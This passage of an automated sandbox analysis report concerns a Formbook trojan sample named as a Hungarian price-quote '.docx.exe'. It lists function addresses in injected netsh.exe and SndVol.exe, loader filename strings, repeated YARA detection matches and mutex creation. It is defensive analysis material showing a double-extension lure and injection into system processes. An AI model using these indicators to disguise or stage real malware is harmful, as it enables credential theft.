          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0389FDC07_2_0389FDC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03883D407_2_03883D40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03931D5A7_2_03931D5A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03937D737_2_03937D73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0393FCF27_2_0393FCF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_038F9C327_2_038F9C32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9D72A7_2_00B9D72A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9EB637_2_00B9EB63
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B82D907_2_00B82D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9DEC57_2_00B9DEC5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B9EE187_2_00B9EE18
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B89E1A7_2_00B89E1A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B89E607_2_00B89E60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B89E5B7_2_00B89E5B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_00B82FB07_2_00B82FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0368A0367_2_0368A036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03685B307_2_03685B30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03685B327_2_03685B32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0368B2327_2_0368B232
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_036889127_2_03688912
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_036810827_2_03681082
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_03682D027_2_03682D02
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_0368E5CD7_2_0368E5CD
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: String function: 029A46D4 appears 244 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: String function: 029B894C appears 56 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: String function: 029B89D0 appears 45 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: String function: 029A44DC appears 74 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: String function: 029A4860 appears 949 times
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: String function: 029A4500 appears 33 times
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 365E7E54 appears 107 times
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 3661F290 appears 101 times
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 3658B970 appears 262 times
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 3660EA12 appears 82 times
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 365D5130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 038C7E54 appears 107 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 038FF290 appears 103 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 038EEA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 038B5130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0386B970 appears 262 times
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeBinary or memory string: OriginalFilename vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002805000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1831855062.000000007FC4F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002806000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021606000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe PID: 6928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SndVol.exe PID: 2664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 4948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@290/6@14/2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_01567F40 DisplayMessageM,FormatMessageW,GetLastError,GetStdHandle,LocalFree,7_2_01567F40
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A7FD2 GetDiskFreeSpaceA,0_2_029A7FD2
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BAD98 CreateToolhelp32Snapshot,0_2_029BAD98
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B6DC8 CoCreateInstance,0_2_029B6DC8
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
